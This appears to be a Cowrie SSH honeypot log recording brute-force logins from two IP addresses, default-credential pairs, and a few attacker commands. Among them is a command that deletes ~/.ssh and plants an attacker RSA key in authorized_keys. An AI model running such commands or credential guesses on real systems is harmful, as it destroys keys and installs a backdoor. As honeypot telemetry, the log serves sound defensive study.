{"eventid":"cowrie.command.failed","input":"cat /proc/uptime | cut -d -f1 | cut -d. -f1","message":"Command not found: cat /proc/uptime | cut -d -f1 | cut -d. -f1","sensor":"my-vps","timestamp":"2025-08-31T04:59:06.221111Z","src_ip":"212.227.125.160","session":"e5fa48d6b2ca"}
{"eventid":"cowrie.command.input","input":"(secondsStr","message":"CMD: (secondsStr","sensor":"my-vps","timestamp":"2025-08-31T04:59:06.223197Z","src_ip":"212.227.125.160","session":"e5fa48d6b2ca"}
{"eventid":"cowrie.command.input","input":"(seconds/86400","message":"CMD: (seconds/86400","sensor":"my-vps","timestamp":"2025-08-31T04:59:06.224547Z","src_ip":"212.227.125.160","session":"e5fa48d6b2ca"}
{"eventid":"cowrie.command.input","input":"( (seconds%86400","message":"CMD: ( (seconds%86400","sensor":"my-vps","timestamp":"2025-08-31T04:59:06.225799Z","src_ip":"212.227.125.160","session":"e5fa48d6b2ca"}
{"eventid":"cowrie.command.input","input":"(seconds%86400","message":"CMD: (seconds%86400","sensor":"my-vps","timestamp":"2025-08-31T04:59:06.226475Z","src_ip":"212.227.125.160","session":"e5fa48d6b2ca"}
{"eventid":"cowrie.command.input","input":"( (seconds%3600","message":"CMD: ( (seconds%3600","sensor":"my-vps","timestamp":"2025-08-31T04:59:06.227810Z","src_ip":"212.227.125.160","session":"e5fa48d6b2ca"}
{"eventid":"cowrie.command.input","input":"(seconds%3600","message":"CMD: (seconds%3600","sensor":"my-vps","timestamp":"2025-08-31T04:59:06.228367Z","src_ip":"212.227.125.160","session":"e5fa48d6b2ca"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/1b20a210fe96e5a8abc347dfb91d7befecb4b5f9b7ed40d856410fac15952057","shasum":"1b20a210fe96e5a8abc347dfb91d7befecb4b5f9b7ed40d856410fac15952057","destfile":"/dev/null","message":"Saved redir contents with SHA-256 1b20a210fe96e5a8abc347dfb91d7befecb4b5f9b7ed40d856410fac15952057 to var/lib/cowrie/downloads/1b20a210fe96e5a8abc347dfb91d7befecb4b5f9b7ed40d856410fac15952057","sensor":"my-vps","timestamp":"2025-08-31T04:59:06.852911Z","src_ip":"212.227.125.160","session":"e5fa48d6b2ca"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/ca88d8e2c0cfe079cce0e55390ff79932c81d831016d8b2dfa21f7db9a052f8c","size":74,"shasum":"ca88d8e2c0cfe079cce0e55390ff79932c81d831016d8b2dfa21f7db9a052f8c","duplicate":true,"duration":"0.6","message":"Closing TTY Log: var/lib/cowrie/tty/ca88d8e2c0cfe079cce0e55390ff79932c81d831016d8b2dfa21f7db9a052f8c after 0.6 seconds","sensor":"my-vps","timestamp":"2025-08-31T04:59:06.853894Z","src_ip":"212.227.125.160","session":"e5fa48d6b2ca"}
{"eventid":"cowrie.session.closed","duration":"5.2","message":"Connection lost after 5.2 seconds","sensor":"my-vps","timestamp":"2025-08-31T04:59:06.855219Z","src_ip":"212.227.125.160","session":"e5fa48d6b2ca"}
{"eventid":"cowrie.login.failed","username":"linaro","password":"linaro","message":"login attempt [linaro/linaro] failed","sensor":"my-vps","timestamp":"2025-08-31T04:59:07.621616Z","src_ip":"212.227.235.229","session":"0224d98a3c1e"}
{"eventid":"cowrie.session.closed","duration":"4.7","message":"Connection lost after 4.7 seconds","sensor":"my-vps","timestamp":"2025-08-31T04:59:09.573523Z","src_ip":"212.227.235.229","session":"0224d98a3c1e"}
{"eventid":"cowrie.login.failed","username":"ranger","password":"ranger","message":"login attempt [ranger/ranger] failed","sensor":"my-vps","timestamp":"2025-08-31T04:59:09.814417Z","src_ip":"212.227.235.229","session":"5fc6e881ec7a"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":39168,"dst_ip":"1.2.3.4","dst_port":22,"session":"89fdddd71456","protocol":"ssh","message":"New connection: 212.227.235.229:39168 (1.2.3.4:22) [session: 89fdddd71456]","sensor":"my-vps","timestamp":"2025-08-31T04:59:10.746877Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-AsyncSSH_2.1.0","message":"Remote SSH version: SSH-2.0-AsyncSSH_2.1.0","sensor":"my-vps","timestamp":"2025-08-31T04:59:10.805327Z","src_ip":"212.227.235.229","session":"89fdddd71456"}
{"eventid":"cowrie.client.kex","hassh":"fda360b1b4f4d3455cb75c6e7edb1d11","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,curve448-sha512,ecdh-sha2-nistp521,ecdh-sha2-nistp384,ecdh-sha2-nistp256,ecdh-sha2-1.3.132.0.10,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha256,diffie-hellman-group15-sha512,diffie-hellman-group16-sha512,diffie-hellman-group17-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,rsa2048-sha256,rsa1024-sha1,ext-info-c;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour256,arcfour128,arcfour;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-md5-etm@openssh.com,hmac-sha2-256-96-etm@openssh.com,hmac-sha2-512-96-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-md5,hmac-sha2-256-96,hmac-sha2-512-96,hmac-sha1-96,hmac-md5-96;zlib@openssh.com,zlib,none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","curve448-sha512","ecdh-sha2-nistp521","ecdh-sha2-nistp384","ecdh-sha2-nistp256","ecdh-sha2-1.3.132.0.10","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha256","diffie-hellman-group15-sha512","diffie-hellman-group16-sha512","diffie-hellman-group17-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","rsa2048-sha256","rsa1024-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ssh-ed448-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-1.3.132.0.10-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ssh-ed25519","ssh-ed448","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","ecdsa-sha2-1.3.132.0.10","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc","blowfish-cbc","cast128-cbc","arcfour256","arcfour128","arcfour"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-md5-etm@openssh.com","hmac-sha2-256-96-etm@openssh.com","hmac-sha2-512-96-etm@openssh.com","hmac-sha1-96-etm@openssh.com","hmac-md5-96-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-md5","hmac-sha2-256-96","hmac-sha2-512-96","hmac-sha1-96","hmac-md5-96"],"compCS":["zlib@openssh.com","zlib","none"],"langCS":[""],"message":"SSH client hassh fingerprint: fda360b1b4f4d3455cb75c6e7edb1d11","sensor":"my-vps","timestamp":"2025-08-31T04:59:11.073354Z","src_ip":"212.227.235.229","session":"89fdddd71456"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":39184,"dst_ip":"1.2.3.4","dst_port":22,"session":"941417edd608","protocol":"ssh","message":"New connection: 212.227.235.229:39184 (1.2.3.4:22) [session: 941417edd608]","sensor":"my-vps","timestamp":"2025-08-31T04:59:13.027641Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-AsyncSSH_2.1.0","message":"Remote SSH version: SSH-2.0-AsyncSSH_2.1.0","sensor":"my-vps","timestamp":"2025-08-31T04:59:13.045135Z","src_ip":"212.227.235.229","session":"941417edd608"}
{"eventid":"cowrie.client.kex","hassh":"fda360b1b4f4d3455cb75c6e7edb1d11","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,curve448-sha512,ecdh-sha2-nistp521,ecdh-sha2-nistp384,ecdh-sha2-nistp256,ecdh-sha2-1.3.132.0.10,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha256,diffie-hellman-group15-sha512,diffie-hellman-group16-sha512,diffie-hellman-group17-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,rsa2048-sha256,rsa1024-sha1,ext-info-c;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour256,arcfour128,arcfour;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-md5-etm@openssh.com,hmac-sha2-256-96-etm@openssh.com,hmac-sha2-512-96-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-md5,hmac-sha2-256-96,hmac-sha2-512-96,hmac-sha1-96,hmac-md5-96;zlib@openssh.com,zlib,none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","curve448-sha512","ecdh-sha2-nistp521","ecdh-sha2-nistp384","ecdh-sha2-nistp256","ecdh-sha2-1.3.132.0.10","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha256","diffie-hellman-group15-sha512","diffie-hellman-group16-sha512","diffie-hellman-group17-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","rsa2048-sha256","rsa1024-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ssh-ed448-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-1.3.132.0.10-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ssh-ed25519","ssh-ed448","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","ecdsa-sha2-1.3.132.0.10","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc","blowfish-cbc","cast128-cbc","arcfour256","arcfour128","arcfour"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-md5-etm@openssh.com","hmac-sha2-256-96-etm@openssh.com","hmac-sha2-512-96-etm@openssh.com","hmac-sha1-96-etm@openssh.com","hmac-md5-96-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-md5","hmac-sha2-256-96","hmac-sha2-512-96","hmac-sha1-96","hmac-md5-96"],"compCS":["zlib@openssh.com","zlib","none"],"langCS":[""],"message":"SSH client hassh fingerprint: fda360b1b4f4d3455cb75c6e7edb1d11","sensor":"my-vps","timestamp":"2025-08-31T04:59:13.293057Z","src_ip":"212.227.235.229","session":"941417edd608"}
{"eventid":"cowrie.login.success","username":"root","password":"root1234","message":"login attempt [root/root1234] succeeded","sensor":"my-vps","timestamp":"2025-08-31T04:59:14.220830Z","src_ip":"212.227.235.229","session":"89fdddd71456"}
{"eventid":"cowrie.login.success","username":"root","password":"112233","message":"login attempt [root/112233] succeeded","sensor":"my-vps","timestamp":"2025-08-31T04:59:14.847477Z","src_ip":"212.227.235.229","session":"941417edd608"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"ip-who.com","dst_port":80,"src_ip":"212.227.235.229","src_port":0,"message":"direct-tcp connection request to ip-who.com:80 from :0","sensor":"my-vps","timestamp":"2025-08-31T04:59:15.351934Z","session":"941417edd608"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"ip-who.com","dst_port":80,"data":"b'GET /json/ HTTP/1.1\\r\\nHost: ip-who.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to ip-who.com:80 with data b'GET /json/ HTTP/1.1\\r\\nHost: ip-who.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T04:59:15.619390Z","src_ip":"212.227.235.229","session":"941417edd608"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"ip-who.com","dst_port":80,"src_ip":"212.227.235.229","src_port":0,"message":"direct-tcp connection request to ip-who.com:80 from :0","sensor":"my-vps","timestamp":"2025-08-31T04:59:16.531402Z","session":"89fdddd71456"}
{"eventid":"cowrie.session.closed","duration":"3.5","message":"Connection lost after 3.5 seconds","sensor":"my-vps","timestamp":"2025-08-31T04:59:16.564529Z","src_ip":"212.227.235.229","session":"941417edd608"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"ip-who.com","dst_port":80,"data":"b'GET /json/ HTTP/1.1\\r\\nHost: ip-who.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to ip-who.com:80 with data b'GET /json/ HTTP/1.1\\r\\nHost: ip-who.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T04:59:17.179312Z","src_ip":"212.227.235.229","session":"89fdddd71456"}
{"eventid":"cowrie.session.closed","duration":"38.4","message":"Connection lost after 38.4 seconds","sensor":"my-vps","timestamp":"2025-08-31T04:59:17.344930Z","src_ip":"212.227.235.229","session":"5fc6e881ec7a"}
{"eventid":"cowrie.session.closed","duration":"6.7","message":"Connection lost after 6.7 seconds","sensor":"my-vps","timestamp":"2025-08-31T04:59:17.418806Z","src_ip":"212.227.235.229","session":"89fdddd71456"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":40932,"dst_ip":"1.2.3.4","dst_port":22,"session":"27da2eefe62f","protocol":"ssh","message":"New connection: 212.227.235.229:40932 (1.2.3.4:22) [session: 27da2eefe62f]","sensor":"my-vps","timestamp":"2025-08-31T04:59:19.957252Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-AsyncSSH_2.1.0","message":"Remote SSH version: SSH-2.0-AsyncSSH_2.1.0","sensor":"my-vps","timestamp":"2025-08-31T04:59:19.974374Z","src_ip":"212.227.235.229","session":"27da2eefe62f"}
{"eventid":"cowrie.client.kex","hassh":"fda360b1b4f4d3455cb75c6e7edb1d11","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,curve448-sha512,ecdh-sha2-nistp521,ecdh-sha2-nistp384,ecdh-sha2-nistp256,ecdh-sha2-1.3.132.0.10,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha256,diffie-hellman-group15-sha512,diffie-hellman-group16-sha512,diffie-hellman-group17-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,rsa2048-sha256,rsa1024-sha1,ext-info-c;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour256,arcfour128,arcfour;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-md5-etm@openssh.com,hmac-sha2-256-96-etm@openssh.com,hmac-sha2-512-96-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-md5,hmac-sha2-256-96,hmac-sha2-512-96,hmac-sha1-96,hmac-md5-96;zlib@openssh.com,zlib,none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","curve448-sha512","ecdh-sha2-nistp521","ecdh-sha2-nistp384","ecdh-sha2-nistp256","ecdh-sha2-1.3.132.0.10","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha256","diffie-hellman-group15-sha512","diffie-hellman-group16-sha512","diffie-hellman-group17-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","rsa2048-sha256","rsa1024-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ssh-ed448-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-1.3.132.0.10-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ssh-ed25519","ssh-ed448","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","ecdsa-sha2-1.3.132.0.10","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc","blowfish-cbc","cast128-cbc","arcfour256","arcfour128","arcfour"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-md5-etm@openssh.com","hmac-sha2-256-96-etm@openssh.com","hmac-sha2-512-96-etm@openssh.com","hmac-sha1-96-etm@openssh.com","hmac-md5-96-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-md5","hmac-sha2-256-96","hmac-sha2-512-96","hmac-sha1-96","hmac-md5-96"],"compCS":["zlib@openssh.com","zlib","none"],"langCS":[""],"message":"SSH client hassh fingerprint: fda360b1b4f4d3455cb75c6e7edb1d11","sensor":"my-vps","timestamp":"2025-08-31T04:59:20.247925Z","src_ip":"212.227.235.229","session":"27da2eefe62f"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":60204,"dst_ip":"1.2.3.4","dst_port":22,"session":"f1c1156df3cc","protocol":"ssh","message":"New connection: 212.227.235.229:60204 (1.2.3.4:22) [session: f1c1156df3cc]","sensor":"my-vps","timestamp":"2025-08-31T04:59:20.847036Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T04:59:20.847896Z","src_ip":"212.227.235.229","session":"f1c1156df3cc"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T04:59:21.099611Z","src_ip":"212.227.235.229","session":"f1c1156df3cc"}
{"eventid":"cowrie.login.failed","username":"walter","password":"walter","message":"login attempt [walter/walter] failed","sensor":"my-vps","timestamp":"2025-08-31T04:59:21.634589Z","src_ip":"212.227.235.229","session":"27da2eefe62f"}
{"eventid":"cowrie.login.success","username":"root","password":"chobits","message":"login attempt [root/chobits] succeeded","sensor":"my-vps","timestamp":"2025-08-31T04:59:22.138350Z","src_ip":"212.227.235.229","session":"f1c1156df3cc"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T04:59:23.123863Z","src_ip":"212.227.235.229","session":"f1c1156df3cc"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-31T04:59:23.124678Z","src_ip":"212.227.235.229","session":"f1c1156df3cc"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-31T04:59:23.125514Z","src_ip":"212.227.235.229","session":"f1c1156df3cc"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-31T04:59:23.374712Z","src_ip":"212.227.235.229","session":"f1c1156df3cc"}
{"eventid":"cowrie.session.closed","duration":"3.9","message":"Connection lost after 3.9 seconds","sensor":"my-vps","timestamp":"2025-08-31T04:59:23.816841Z","src_ip":"212.227.235.229","session":"27da2eefe62f"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T04:59:23.891126Z","src_ip":"212.227.235.229","session":"f1c1156df3cc"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-31T04:59:23.891805Z","src_ip":"212.227.235.229","session":"f1c1156df3cc"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-31T04:59:24.141314Z","src_ip":"212.227.235.229","session":"f1c1156df3cc"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-31T04:59:24.142241Z","src_ip":"212.227.235.229","session":"f1c1156df3cc"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":60972,"dst_ip":"1.2.3.4","dst_port":22,"session":"1924fd3e1d6d","protocol":"ssh","message":"New connection: 212.227.235.229:60972 (1.2.3.4:22) [session: 1924fd3e1d6d]","sensor":"my-vps","timestamp":"2025-08-31T04:59:24.389483Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T04:59:24.390569Z","src_ip":"212.227.235.229","session":"1924fd3e1d6d"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T04:59:24.643715Z","src_ip":"212.227.235.229","session":"1924fd3e1d6d"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":52954,"dst_ip":"1.2.3.4","dst_port":22,"session":"772c8586afee","protocol":"ssh","message":"New connection: 212.227.125.160:52954 (1.2.3.4:22) [session: 772c8586afee]","sensor":"my-vps","timestamp":"2025-08-31T04:59:25.508244Z"}
